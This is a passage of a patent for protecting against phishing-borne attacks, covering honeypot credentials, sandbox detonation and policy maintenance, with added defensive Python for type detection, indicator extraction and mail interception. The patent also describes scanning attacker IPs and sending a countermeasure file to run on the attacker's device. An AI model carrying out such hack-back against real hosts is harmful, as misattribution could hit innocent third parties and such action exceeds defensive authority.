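    if header_type == "zip" and ext_type in ZIP_CONTAINERS:
        resolved = ext_type
    elif header_type is not None:
        resolved = header_type
    else:
        resolved = ext_type
    mismatch = header_type is not None and ext_type is not None and resolved != ext_type
    return resolved, mismatch, SANDBOX_FOR_TYPE.get(resolved, "generic")


# Constructed attachments: an executable renamed to look like a PDF, an Office
# document, and a text file starting with the UTF-8 byte order mark.
SAMPLES = {
    "invoice.pdf": b"MZ\x90\x00constructed, not a real binary",
    "report.docx": b"PK\x03\x04constructed zip container",
    "readme.txt": b"\xef\xbb\xbfplain text",
}

if __name__ == "__main__":
    for sample_name, sample_data in SAMPLES.items():
        print(sample_name, identify(sample_name, sample_data))
```

A `mismatch` of True is worth recording with the other attack information: a file whose extension and header disagree is a sample that was deliberately disguised, and it still lands in the sandbox chosen for what it actually is.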
Step S102F: monitoring the running behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
The running behavior of the malicious file may include damaging and deleting files, sending passwords, recording keyboard input, carrying out DoS (Denial of Service) attacks, and the like.
The following describes different cases in which the security device obtains attack information of an attacker.
In the first case, the security device may monitor the operation behavior of the malicious file, and obtain, based on the monitoring result, a file fingerprint of the malicious file as attack information of an attacker.
Specifically, the security device may generate a file fingerprint of the malicious file based on a file fingerprint generation algorithm. For example, the security device may generate an MD5 value of the malicious file based on the MD5 (Message-Digest Algorithm 5) algorithm as the file fingerprint of the malicious file; the security device may also generate a SHA-1 value of the malicious file based on SHA-1 (Secure Hash Algorithm 1) as the file fingerprint of the malicious file.
In the second case, the security device may monitor the operation behavior of the malicious file, and obtain, based on the monitoring result, registry information of the malicious file as attack information of an attacker.
Specifically, when a malicious file runs, it may generate its own registry information in the system. The security device may monitor the malicious file's behavior of generating registry information, thereby obtaining the generated registry information.
Similar to the description of the foregoing step S102C, the security device may obtain information related to any of the above cases as attack information of an attacker, or may obtain a combination of information related to a plurality of cases as attack information of an attacker. The embodiment of the present invention is not limited thereto.
Thus, based on the running behavior of the malicious file, file fingerprints and registry information of the malicious file are obtained and used as attack information of an attacker, and the obtained attack information of the attacker is enriched.
In this way, by running the malicious files included in the phishing mail in the virtual sandbox environment, the running behavior of the malicious files can be monitored under the condition that the malicious files cannot cause real attacks, and the obtained monitoring result is used as attack information of an attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by the phishing mail containing the malicious file.
In addition, based on the embodiment shown in fig. 4, in one case, the security device may further monitor the network request generated by running the malicious file, and obtain, based on the monitoring result, the internet protocol address associated with the network request as attack information of the attacker.
Specifically, the security device may acquire, based on the format of the network request, an internet protocol address carried in a request header of the network request as the internet protocol address associated with the network request.
Based on the monitoring of the network request generated by the malicious file, the Internet protocol address associated with the network request is obtained, so that the capability of the security device for obtaining attack information of an attacker can be improved.
In another case, the security device may monitor the execution path of the backdoor program released by the malicious file, and use the execution path as attack information of an attacker.
Therefore, the execution path of the backdoor program released by the malicious file is determined to be the attack information of the attacker, and the obtained attack information of the attacker can be enriched.
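The monitoring results described from step S102F onward (file fingerprint, registry information, the internet protocol address behind a network request, and the execution path of a released backdoor program), turned into one attack-information record in an added Python example that is not the patent's code. It assumes a hypothetical sandbox that reports what the sample did as a dict; `SAMPLE_REPORT` is constructed, with addresses from the documentation ranges and invented paths. The address is read from the request's `Host` header, one concrete form of "based on the format of the network request"; a SHA-256 digest is computed alongside the MD5 and SHA-1 the text names, since those two are no longer collision resistant.

```python
"""Attack information from the monitored run of a malicious file.

Added example, not the patent's code. It assumes a hypothetical sandbox that
reports what the sample did as a dict (SAMPLE_REPORT below is constructed);
the functions turn that report into the items the text names: file
fingerprints, registry information, the address behind each network request
and the execution path of any dropped program.
"""
import hashlib
import ipaddress
from typing import Optional


def file_fingerprints(data: bytes) -> dict:
    """MD5 and SHA-1 as in the text, plus SHA-256. The first two still serve
    as lookup keys against existing feeds, but an attacker can craft
    colliding inputs for them, so a stronger digest is kept alongside."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def ip_from_host_header(host: str) -> Optional[str]:
    """IP literal from an HTTP Host header (with optional port); None for a hostname."""
    host = host.strip()
    if host.startswith("["):                  # bracketed IPv6 literal, [addr]:port
        host = host[1:host.index("]")]
    elif host.count(":") == 1:                # IPv4 literal with port
        host = host.split(":", 1)[0]
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return None


def build_attack_info(report: dict) -> dict:
    """Collect the monitoring results the text lists into one record."""
    contact_ips = []
    for req in report.get("network_requests", []):
        ip = ip_from_host_header(req.get("headers", {}).get("Host", ""))
        if ip and ip not in contact_ips:
            contact_ips.append(ip)
    # A dropped file that the sample then executed is the released backdoor
    # program whose execution path the text asks for.
    backdoor_paths = [f["path"] for f in report.get("dropped_files", []) if f.get("executed")]
    return {
        "file_name": report["file_name"],
        "fingerprints": file_fingerprints(report["file_bytes"]),
        "registry_info": [dict(w) for w in report.get("registry_writes", [])],
        "contact_ips": contact_ips,
        "backdoor_paths": backdoor_paths,
    }


# Constructed sandbox report (addresses from the documentation ranges, paths invented).
SAMPLE_REPORT = {
    "file_name": "invoice.exe",
    "file_bytes": b"MZ\x90\x00constructed, not a real binary",
    "registry_writes": [
        {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
         "value": "updater", "data": r"C:\Users\Public\svc.exe"},
    ],
    "network_requests": [
        {"method": "POST", "path": "/gate", "headers": {"Host": "198.51.100.23:8080"}},
        {"method": "GET", "path": "/", "headers": {"Host": "update.example.invalid"}},
        {"method": "POST", "path": "/gate", "headers": {"Host": "198.51.100.23:8080"}},
    ],
    "dropped_files": [
        {"path": r"C:\Users\Public\svc.exe", "executed": True},
        {"path": r"C:\Users\Public\notes.txt", "executed": False},
    ],
}

if __name__ == "__main__":
    import json
    print(json.dumps(build_attack_info(SAMPLE_REPORT), indent=2))
```

Requests whose `Host` is a hostname rather than an address are not dropped silently in practice; they would be resolved from inside the sandbox's controlled resolver and the resolved address recorded, which the example omits to stay offline.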
In one embodiment of the invention, an attacker can send a request to a server by logging in a honeypot account, and can also send a request to the server by a malicious file. Therefore, in this embodiment, the security device may monitor the operation that the attacker requests the target server to execute, and obtain the attack information of the attacker based on the monitoring result.
Here, the target server is the virtual server to which the phishing mail requests a connection.
The target server is typically a server disguised to have high value for the attack, such as a server containing enterprise business data, to induce a request to the target server from an attacker.
Specifically, based on the monitoring result, the internet protocol address of the attack device of the attacker, the service requested by the attacker, and the like carried in the request sent by the attacker can be obtained as attack information of the attacker.
Thus, the attack information of the attacker is obtained based on the operation of the attacker on the request of the target server, and the capability of the security device for obtaining the attack information of the attacker can be improved.
In one embodiment of the invention, the security device can query the third party platform for information matched with the obtained attack information of the attacker, and the information is used as the attack information of the attacker.
For example, the security device may query, based on the obtained internet protocol address of the attacker, information matching the internet protocol address from the third party platform as attack information of the attacker, where the information may be login information of the attacker logging into the third party platform, such as user agent information, device fingerprint information, and so on. The security device may also query the third party platform for information matching the obtained attacker's attack information based on the obtained attacker's user agent, device fingerprint, etc. The embodiment of the present invention is not limited thereto.
Thus, the attack information of the attacker can be further obtained by inquiring the information matched with the obtained attack information of the attacker in the third-party platform, and the obtained attack information is rich and comprehensive.
The following describes a maintenance method of the protection policy in step S103.
As previously described, since attack information of an attacker may include a variety of information, different protection policies may be maintained based on different attack information.
In a first implementation, the interception policy of the phishing mail may be maintained according to the attack information.
For example, it may be determined that a mail sent by a mail sender of an obtained phishing mail is a phishing mail to be intercepted; the phishing website can be identified based on the obtained information such as the Internet protocol address, the user agent, the device fingerprint and the like of the attacker, so that the mail containing the connection information of the phishing website is determined to be the phishing mail to be intercepted; the malicious files may be identified based on the obtained file fingerprints of the malicious files, registry information, and associated internet protocol addresses, thereby determining that the mail containing the malicious files is a phishing mail to be intercepted.
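The first implementation, maintaining the interception policy from collected attack information, as an added Python example (not the patent's code). The record and mail shapes are assumptions: an attack-information record is a dict with any of `sender`, `phishing_urls`, `attacker_ips` and `file_sha256`, and an incoming mail is a dict with `sender`, `urls` and `attachment_sha256`; the records and mails below are constructed. Maintaining the policy means folding each new record into the indicator sets, and the mail protection device matches incoming mail against those sets.

```python
"""Maintaining a phishing-mail interception policy from attack information.

Added example, not the patent's code. The attack-information records, the
mail shape and the matching rules are assumptions made for the example.
"""
from urllib.parse import urlsplit


class InterceptionPolicy:
    """Indicator sets the mail protection device matches incoming mail against."""

    def __init__(self):
        self.senders = set()        # senders of obtained phishing mails
        self.url_hosts = set()      # hosts of identified phishing websites
        self.attacker_ips = set()   # attacker addresses from login records and sandbox runs
        self.file_sha256 = set()    # fingerprints of malicious attachments

    def add_record(self, record: dict) -> None:
        """Maintain the policy: fold one attack-information record into the sets."""
        if record.get("sender"):
            self.senders.add(record["sender"].lower())
        for url in record.get("phishing_urls", []):
            host = urlsplit(url).hostname
            if host:
                self.url_hosts.add(host.lower())
        self.attacker_ips.update(record.get("attacker_ips", []))
        self.file_sha256.update(h.lower() for h in record.get("file_sha256", []))

    def match(self, mail: dict) -> list:
        """Reasons to intercept the mail; an empty list means let it through."""
        reasons = []
        sender = mail.get("sender", "").lower()
        if sender in self.senders:
            reasons.append("sender:" + sender)
        for url in mail.get("urls", []):
            host = (urlsplit(url).hostname or "").lower()
            # A link to the phishing site by name or straight to the attacker's
            # address both identify a mail containing the website's connection info.
            if host in self.url_hosts or host in self.attacker_ips:
                reasons.append("url-host:" + host)
        for digest in mail.get("attachment_sha256", []):
            if digest.lower() in self.file_sha256:
                reasons.append("attachment:" + digest.lower())
        return reasons


# Constructed attack information, as the collection steps would produce it.
# The SHA-256 value is a constructed placeholder (digest of "abc").
ATTACK_RECORDS = [
    {"sender": "it-helpdesk@example.invalid",
     "phishing_urls": ["https://login.example.invalid/sso"],
     "attacker_ips": ["203.0.113.5"]},
    {"file_sha256": ["ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"]},
]


def build_policy(records=ATTACK_RECORDS) -> InterceptionPolicy:
    policy = InterceptionPolicy()
    for record in records:
        policy.add_record(record)
    return policy


# Constructed incoming mails: same sender with different case, a link straight
# to the attacker's address, and a clean mail.
MAILS = [
    {"sender": "IT-Helpdesk@example.invalid", "urls": [], "attachment_sha256": []},
    {"sender": "partner@example.net", "urls": ["http://203.0.113.5/reset"], "attachment_sha256": []},
    {"sender": "partner@example.net", "urls": ["https://example.net/"], "attachment_sha256": []},
]

if __name__ == "__main__":
    policy = build_policy()
    for mail in MAILS:
        print(mail["sender"], policy.match(mail) or "deliver")
```

Returning the reasons rather than a bare verdict lets the interception be logged with the indicator that fired, which is what an analyst needs when a rule derived from one phishing campaign starts matching legitimate mail and has to be retired.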
In a second implementation, the vulnerability restoration policy may be maintained according to the attack information.
Specifically, the security device may determine, according to the running behavior of the malicious file, the vulnerability exploited by the malicious file and the manner in which the malicious file exploits it, and determine, based on that manner of exploitation, a repair method for the vulnerability.
For example, if the malicious file exploits a vulnerability arising from improper system configuration, the determined repair method for the vulnerability is to modify the system configuration information; if the malicious file exploits a vulnerability arising from an outdated system version, the determined repair method is to update the system version. In addition, the determined repair method may be to install a security patch.
In a third implementation, the interference attack behavior policy may be maintained according to the attack information.
For example, the countermeasures sent to the attacker's device may be determined based on the attacker's internet protocol address, thereby interfering with the attacker's attack behaviour.
According to the information content of the obtained attack information, the security device may only maintain one protection policy, or may also maintain multiple protection policies at the same time, which is not limited in the embodiment of the present invention.
In this way, according to the obtained attack information, different protection strategies are maintained, so that the interception capability of the phishing mail in the mails subsequently received by the protected mailbox can be improved, the loopholes possibly utilized by the malicious files can be repaired, the subsequently received attack behaviors can be counteracted, and the protection capability on network attacks is improved.
The following describes a protection method for the network attack in step S104.
Corresponding to the protection policy in step S103, for the maintained interception policy of the phishing mail, the security device may update the interception policy of the mail protection device, so that the mail protection device intercepts the phishing mail according to the interception policy; for the maintained vulnerability restoration strategy, the security device restores the vulnerability according to the vulnerability restoration strategy; for the maintained interference attack behavior strategy, the security device will interfere with the attack behavior of the attacker according to the interference attack behavior strategy.
Specifically, for the attack behavior of the interfering attacker, there may be the following two cases.
In one case, the security device may disconnect the attacker from the attacker's device through an attack guard.
For example, the security device may send a countermeasure file to the attacker's device via the attack protection program according to the internet protocol address of the attacker's device, and disconnect the attacker from the attacker's device by means of the countermeasure file running on the attacker's device.
In this case, the attack protection program is a program that controls the countermeasure file.
In another case, the security device may send false information to the attacker's device through the attack guard.
Specifically, the security device may send false information to the attacker's device through the attack protection program according to the internet protocol address of the attacker's device, so that the attacker has difficulty distinguishing the information needed for the actual attack, thereby interfering with the realization of the attacker's attack intention.
In this case, the attack protection program is a program that transmits information.
By countering the attack behavior of the attacker, the attacker's network attack can be interfered with, making it difficult for the attacker to realize the attack intention, and the protection capability against network attacks is improved.
The attack information acquisition method of the phishing mail including the malicious file is described in its entirety as follows.
Referring to fig. 5, a flow diagram of a second way of obtaining attack information is provided.
Similarly to fig. 3, after the security device obtains the phishing mail, the security device analyzes the malicious file in the phishing mail to determine its file type, creates a sandbox environment corresponding to that file type, runs the malicious file in the sandbox environment, monitors the running of the malicious file, and obtains attack information based on the monitoring result.
Based on the above process, the security device may further perform vulnerability scanning on the attacker's IP (Internet Protocol) address according to the attacker's IP address in the obtained attack information, and obtain attack information based on the scanning result.
Corresponding to the network attack protection method, the embodiment of the invention also provides a network attack protection device.
Referring to fig. 6, there is provided a schematic structural diagram of a network attack protection device, the device including:
a phishing mail obtaining module 601, configured to obtain a phishing mail from mails sent to a mailbox protected by the mail protection device;
an attack information obtaining module 602, configured to respond to an operation requested by the phishing mail in a virtual environment, and obtain attack information of an attacker corresponding to the phishing mail based on an execution result of the operation;
a protection policy maintenance module 603, configured to maintain a protection policy according to the attack information;
the network attack guard module 604 is configured to execute the maintained guard policy through the attack guard program.
By applying the scheme provided by the embodiment of the invention, the operation requested by the phishing mail can be responded to in the virtual environment, so that the attack information of the attacker can be obtained according to that operation. Since the operations requested by the phishing mail are performed in the virtual environment, they do not cause a real attack, while the attack information of the attacker is exposed. The security device may maintain the protection policy according to the attack information of the attacker, and execute the maintained protection policy. Because the protection policy is maintained based on the obtained attack information of the attacker, and that information is collected by the security device from what the attacker's network attack exposes in the virtual environment, the protection policy is targeted at the attacker's type of network attack, and executing the maintained protection policy can effectively protect against the network attack. Therefore, by applying the scheme provided by the embodiment of the invention, the degree of protection against network attacks can be improved.
In one embodiment of the invention, the phishing mail includes connection information of a phishing website;
the attack information acquisition module 602 includes:
the interface identification unit is used for analyzing the website code and/or the network requests of the phishing website based on the connection information of the phishing website, and identifying the background interface of the phishing website;
the account sending unit is used for sending the monitored honey account and password information to the attacker equipment through the background interface;
the first attack information obtaining unit is used for responding to the attacker to log in the honey pot account based on the password information and obtaining a login record of the honey pot account as attack information of the attacker.
The honeypot account and password information are sent to the attacker's device through a background interface of the phishing website included in the phishing mail, so that the attacker is induced to log in to the honeypot account. Because the honeypot account is a monitored account, when the attacker logs in to it, the security device can obtain the login record of the honeypot account as attack information of the attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by a phishing mail containing link information of a phishing website.
In one embodiment of the invention, the apparatus further comprises:
the address determining module is used for determining an Internet protocol address of an attacker based on at least one of the website code, the network request and the login record of the phishing website;
and the vulnerability scanning module is used for carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
Thus, vulnerability scanning is carried out on the Internet protocol address of the attacker, vulnerability information of equipment corresponding to the Internet protocol address of the attacker can be obtained, and the vulnerability information is used as attack information of the attacker, so that the variety of the obtained attack information is enriched.
In one embodiment of the present invention, the first attack information obtaining unit is specifically configured to obtain at least one of an internet protocol address, a user agent, a device fingerprint associated with the honeypot account, and an access behavior of the honeypot account, as attack information of the attacker.
Thus, the security device can obtain various information of the attacker, and the obtained attack information is rich and comprehensive as the attack information of the attacker.
In one embodiment of the invention, the phishing mail includes malicious files;
the attack information acquisition module 602 includes:
a file type analysis unit for analyzing the file type of the malicious file;
the file running unit is used for running the malicious files in a sandbox running environment corresponding to the file type, wherein the malicious files comprise computer viruses or files carrying the computer viruses;
the second attack information obtaining unit is used for monitoring the operation behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
In this way, by running the malicious files included in the phishing mail in the virtual sandbox environment, the running behavior of the malicious files can be monitored under the condition that the malicious files cannot cause real attacks, and the obtained monitoring result is used as attack information of an attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by the phishing mail containing the malicious file.
In one embodiment of the present invention, the second attack information obtaining unit is specifically configured to monitor a network request generated by running the malicious file, and obtain, based on a monitoring result, an internet protocol address associated with the network request as attack information of the attacker; and/or monitoring an execution path of the backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
Based on the monitoring of the network request generated by the malicious file, the Internet protocol address associated with the network request is obtained, so that the capability of the security device for obtaining attack information of an attacker can be improved; the execution path of the backdoor program released by the malicious file is determined to be the attack information of the attacker, so that the obtained attack information of the attacker can be enriched.
In one embodiment of the present invention, the second attack information obtaining unit is specifically configured to monitor an operation behavior of the malicious file, and obtain, based on a monitoring result, a file fingerprint of the malicious file and/or registry information of the malicious file as attack information of the attacker.
Thus, based on the running behavior of the malicious file, file fingerprints and registry information of the malicious file are obtained and used as attack information of an attacker, and the obtained attack information of the attacker is enriched.
In one embodiment of the invention, the apparatus further comprises:
the operation monitoring module is used for monitoring the operation that the attacker requests the target server to execute, and obtaining the attack information of the attacker based on the monitoring result, where the target server is the virtual server to which the phishing mail requests a connection.
Thus, the attack information of the attacker is obtained based on the operation of the attacker on the request of the target server, and the capability of the security device for obtaining the attack information of the attacker can be improved.
In one embodiment of the invention, the apparatus further comprises:
and the information inquiry module is used for inquiring the information matched with the obtained attack information of the attacker in the third-party platform to be used as the attack information of the attacker.
Thus, the attack information of the attacker can be further obtained by inquiring the information matched with the obtained attack information of the attacker in the third-party platform, and the obtained attack information is rich and comprehensive.
In one embodiment of the present invention, the protection policy maintenance module 603 is specifically configured to perform at least one of the following manners: according to the attack information, maintaining an interception strategy of the phishing mails; maintaining a vulnerability restoration strategy according to the attack information; and maintaining an interference attack behavior strategy according to the attack information.
In this way, according to the obtained attack information, different protection strategies are maintained, so that the interception capability of the phishing mail in the mails subsequently received by the protected mailbox can be improved, the loopholes possibly utilized by the malicious files can be repaired, the subsequently received attack behaviors can be counteracted, and the protection capability on network attacks is improved.
In one embodiment of the present invention, the network attack protection module 604 is specifically configured to disconnect the attacker from the attacker's device through an attack protection program; and/or sending false information to the attacker's device through an attack guard.
By countering the attack behavior of the attacker, the attacker's network attack can be interfered with, making it difficult for the attacker to realize the attack intention, and the protection capability against network attacks is improved.
The embodiment of the present invention further provides an electronic device, as shown in fig. 7, including a processor 701, a communication interface 702, a memory 703 and a communication bus 704, where the processor 701, the communication interface 702, and the memory 703 perform communication with each other through the communication bus 704,
a memory 703 for storing a computer program;
the processor 701 is configured to implement the network attack protection method described in the foregoing method embodiment when executing the program stored in the memory 703.
The communication bus mentioned for the above terminal may be a Peripheral Component Interconnect (PCI) bus or an Extended Industry Standard Architecture (EISA) bus, etc. The communication bus may be divided into an address bus, a data bus, a control bus, and the like. For ease of illustration, the figures show only one bold line, which does not mean that there is only one bus or only one type of bus.
The communication interface is used for communication between the terminal and other devices.
The memory may include random access memory (Random Access Memory, RAM) or non-volatile memory (non-volatile memory), such as at least one disk memory. Optionally, the memory may also be at least one memory device located remotely from the aforementioned processor.
The processor may be a general-purpose processor, including a central processing unit (Central Processing Unit, CPU for short), a network processor (Network Processor, NP for short), etc.; but also digital signal processors (Digital Signal Processor, DSP for short), application specific integrated circuits (Application Specific Integrated Circuit, ASIC for short), field-programmable gate arrays (Field-Programmable Gate Array, FPGA for short) or other programmable logic devices, discrete gate or transistor logic devices, discrete hardware components.
In yet another embodiment of the present invention, a computer readable storage medium is provided, where a computer program is stored, where the computer program, when executed by a processor, implements the network attack protection method according to the foregoing method embodiment.
The above embodiments may be implemented in whole or in part by software, hardware, firmware, or any combination thereof. When implemented in software, they may be implemented in whole or in part in the form of a computer program product. The computer program product includes one or more computer instructions. When the computer instructions are loaded and executed on a computer, they produce, in whole or in part, a flow or function in accordance with the embodiments of the present invention. The computer may be a general purpose computer, a special purpose computer, a computer network, or other programmable apparatus. The computer instructions may be stored in, or transmitted from one computer-readable storage medium to another, for example by wired means (e.g., coaxial cable, optical fiber, Digital Subscriber Line (DSL)) or wireless means (e.g., infrared, radio, microwave). The computer readable storage medium may be any available medium that can be accessed by a computer, or a data storage device such as a server or data center that integrates one or more available media. The available medium may be a magnetic medium (e.g., floppy disk, hard disk, magnetic tape), an optical medium (e.g., DVD), or a semiconductor medium (e.g., Solid State Disk (SSD)), etc.
It is noted that relational terms such as first and second, and the like, are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Moreover, the terms "comprises," "comprising," or any other variation thereof are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising a …" does not exclude the presence of other like elements in a process, method, article, or apparatus that comprises the element.
In this specification, each embodiment is described in a related manner; identical and similar parts of the embodiments may be referred to each other, and each embodiment mainly describes its differences from the other embodiments. In particular, for the apparatus, electronic device and storage medium embodiments, since they are substantially similar to the method embodiments, the description is relatively simple, and reference may be made to the relevant parts of the description of the method embodiments.
The foregoing description is only of the preferred embodiments of the present invention and is not intended to limit the scope of the present invention. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention are included in the protection scope of the present invention.

Claims (14)

1. A method for protecting against network attacks, applied to a security device, the method comprising:
acquiring phishing mails from among the mails sent to a mailbox protected by mail protection equipment;
responding, in a virtual environment, to the operation requested by the phishing mail, and obtaining attack information of an attacker corresponding to the phishing mail based on the execution result of the operation;
maintaining a protection policy according to the attack information;
and executing the maintained protection policy through an attack protection program.
2. The method of claim 1, wherein the phishing mail includes connection information of a phishing website;
and the responding, in the virtual environment, to the operation requested by the phishing mail and obtaining attack information of the attacker based on the execution result of the operation comprises:
analyzing website code and/or a network request of the phishing website based on the connection information of the phishing website, and identifying a background interface of the phishing website;
sending monitored honeypot account and password information to the attacker's device through the background interface;
and, in response to the attacker logging in to the honeypot account based on the password information, obtaining a login record of the honeypot account as attack information of the attacker.
3. The method according to claim 2, wherein the method further comprises:
determining an Internet protocol address of the attacker based on at least one of the website code of the phishing website, the network request and the login record;
and carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
4. The method according to claim 2, wherein the obtaining the login record of the honeypot account as attack information of the attacker comprises:
obtaining at least one of the Internet protocol address, the user agent, the device fingerprint and the access behavior associated with the honeypot account as attack information of the attacker.
5. The method of claim 1, wherein the phishing mail comprises a malicious file, the malicious file comprising a computer virus or a file carrying a computer virus;
and the responding, in the virtual environment, to the operation requested by the phishing mail and obtaining attack information of the attacker based on the execution result of the operation comprises:
analyzing the file type of the malicious file;
running the malicious file in a sandbox running environment corresponding to the file type;
and monitoring the running behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
6. The method according to claim 5, wherein the monitoring the running behavior of the malicious file and taking the obtained monitoring result as attack information of the attacker comprises:
monitoring a network request generated by running the malicious file, and acquiring an Internet protocol address associated with the network request based on the monitoring result as attack information of the attacker;
and/or
monitoring an execution path of a backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
7. The method according to claim 5, wherein the monitoring the running behavior of the malicious file and taking the obtained monitoring result as attack information of the attacker comprises:
monitoring the running behavior of the malicious file, and, based on the monitoring result, obtaining a file fingerprint of the malicious file and/or registry information of the malicious file as attack information of the attacker.
8. The method according to any one of claims 1-7, further comprising:
monitoring the operation that the attacker requests the target server to execute, and obtaining attack information of the attacker based on the monitoring result, wherein the target server is a virtual server that the phishing mail requests to connect to.
9. The method according to any one of claims 1-7, further comprising:
querying a third-party platform for information matching the obtained attack information of the attacker, to serve as attack information of the attacker.
10. The method of claim 1, wherein the maintaining a protection policy according to the attack information comprises at least one of:
maintaining an interception policy for phishing mails according to the attack information;
maintaining a vulnerability repair policy according to the attack information;
and maintaining a policy for interfering with attack behavior according to the attack information.
11. The method of claim 10, wherein the executing the maintained protection policy through the attack protection program comprises:
disconnecting the connection with the attacker's device through the attack protection program;
and/or
sending false information to the attacker's device through the attack protection program.
12. A network attack protection device, the device comprising:
a phishing mail obtaining module, used for obtaining phishing mails from among the mails sent to a mailbox protected by mail protection equipment;
an attack information obtaining module, used for responding, in a virtual environment, to the operation requested by the phishing mail and obtaining attack information of an attacker corresponding to the phishing mail based on the execution result of the operation;
a protection policy maintenance module, used for maintaining a protection policy according to the attack information;
and a network attack protection module, used for executing the maintained protection policy through an attack protection program.
13. An electronic device, comprising a processor, a communication interface, a memory and a communication bus, wherein the processor, the communication interface and the memory communicate with each other through the communication bus;
the memory is used for storing a computer program;
and the processor is used for carrying out the method steps of any one of claims 1-11 when executing the program stored in the memory.
14. A computer-readable storage medium, wherein a computer program is stored in the computer-readable storage medium which, when executed by a processor, implements the method steps of any one of claims 1-11.
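As an added illustration (not code from the patent or its applicant), the following Python shows how a security device of the kind claimed above could turn a honeypot account's login records (claim 4) and a sandbox monitoring result for a malicious attachment (claims 6 and 7) into attack information, and then maintain and apply a mail interception and remediation policy from it (claims 1 and 10). The key=value log line format, the sandbox report layout, the policy schema and every sample value (IP addresses from documentation ranges, a hostname under `.invalid`, stand-in byte strings hashed in place of real files) are constructed assumptions. It covers only the extraction and policy-maintenance steps; the backend interaction of claim 2, the scanning of claim 3 and the interference steps of claim 11 are outside its scope.

```python
"""Derive attack information from honeypot logins and a sandbox run, then
maintain and apply a protection policy.  Added illustration: the log format,
report layout and policy schema are assumptions, not the patent's."""
import hashlib
import json
import re
from dataclasses import dataclass, field

# Constructed honeypot login records (assumed key=value line format).
HONEYPOT_LOGIN_LOG = """\
ts=2023-09-27T10:01:02Z account=honey_user01 result=success ip=203.0.113.45 ua="Mozilla/5.0 (X11; Linux x86_64)" fp=3f9a1c action=login
ts=2023-09-27T10:01:09Z account=honey_user01 result=success ip=203.0.113.45 ua="Mozilla/5.0 (X11; Linux x86_64)" fp=3f9a1c action=read_inbox
ts=2023-09-27T10:03:30Z account=honey_user01 result=success ip=198.51.100.7 ua="python-requests/2.31" fp=77be02 action=login
ts=2023-09-27T10:03:31Z account=honey_user01 result=success ip=198.51.100.7 ua="python-requests/2.31" fp=77be02 action=export_contacts
ts=2023-09-27T10:04:00Z account=real_user result=success ip=192.0.2.99 ua="Outlook/16" fp=aa0001 action=login
"""

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Stand-ins for the attachment and the file it drops (constructed, not real binaries).
SAMPLE_BYTES = b"MZ constructed sample, not a real executable"
DROPPED_BYTES = b"MZ constructed dropped backdoor, not a real executable"

# Constructed sandbox monitoring result for the attachment (assumed layout).
SANDBOX_REPORT = {
    "sample": "invoice_0927.pdf.exe", "file_type": "pe",
    "sha256": sha256_hex(SAMPLE_BYTES),
    "network": [{"dst_ip": "192.0.2.10", "dst_port": 443, "host": "update.c2-example.invalid"},
                {"dst_ip": "192.0.2.10", "dst_port": 8443, "host": None}],
    "dropped_files": [{"path": r"C:\Users\Public\svchost32.exe", "sha256": sha256_hex(DROPPED_BYTES)}],
    "registry": [{"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                  "value": "svchost32", "data": r"C:\Users\Public\svchost32.exe"}],
}

@dataclass
class AttackInfo:
    ips: set = field(default_factory=set)
    user_agents: set = field(default_factory=set)
    fingerprints: set = field(default_factory=set)
    hosts: set = field(default_factory=set)
    file_hashes: set = field(default_factory=set)
    backdoor_paths: set = field(default_factory=set)
    registry_entries: set = field(default_factory=set)   # (key, value) pairs
    access_behavior: list = field(default_factory=list)  # (ts, ip, action) tuples

    def merge(self, other: "AttackInfo") -> "AttackInfo":
        for name, val in vars(other).items():
            mine = getattr(self, name)
            if isinstance(mine, set):
                mine.update(val)
            else:
                mine.extend(val)
        return self

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def attack_info_from_logins(log_text: str, honeypot_account: str) -> AttackInfo:
    """Claim 4 style: IP, user agent, fingerprint and behaviour of successful honeypot logins."""
    info = AttackInfo()
    for line in log_text.splitlines():
        ev = {k: v.strip('"') for k, v in KV_RE.findall(line)}
        if ev.get("account") != honeypot_account or ev.get("result") != "success":
            continue  # other accounts' activity is not attack information
        info.ips.add(ev["ip"])
        info.user_agents.add(ev["ua"])
        info.fingerprints.add(ev["fp"])
        info.access_behavior.append((ev["ts"], ev["ip"], ev["action"]))
    return info

def attack_info_from_sandbox(report: dict) -> AttackInfo:
    """Claims 6/7 style: contacted IPs and hosts, dropped paths, hashes, persistence keys."""
    info = AttackInfo()
    info.file_hashes.add(report["sha256"])
    for req in report.get("network", []):
        info.ips.add(req["dst_ip"])
        if req.get("host"):  # raw-IP connections carry no hostname
            info.hosts.add(req["host"])
    for dropped in report.get("dropped_files", []):
        info.backdoor_paths.add(dropped["path"])
        info.file_hashes.add(dropped["sha256"])
    for entry in report.get("registry", []):
        info.registry_entries.add((entry["key"], entry["value"]))
    return info

def build_protection_policy(info: AttackInfo) -> dict:
    """Claim 10 style: interception, network block and endpoint remediation rules."""
    return {
        "mail_interception": {"block_attachment_sha256": sorted(info.file_hashes),
                              "block_link_hosts": sorted(info.hosts)},
        "network_block": {"ips": sorted(info.ips)},
        "endpoint_remediation": {"quarantine_paths": sorted(info.backdoor_paths),
                                 "remove_registry_values": sorted(info.registry_entries)},
    }

def mail_is_intercepted(policy: dict, mail: dict) -> bool:
    """Enforcement: hold a mail whose attachment hash or link host matches the rules."""
    rules = policy["mail_interception"]
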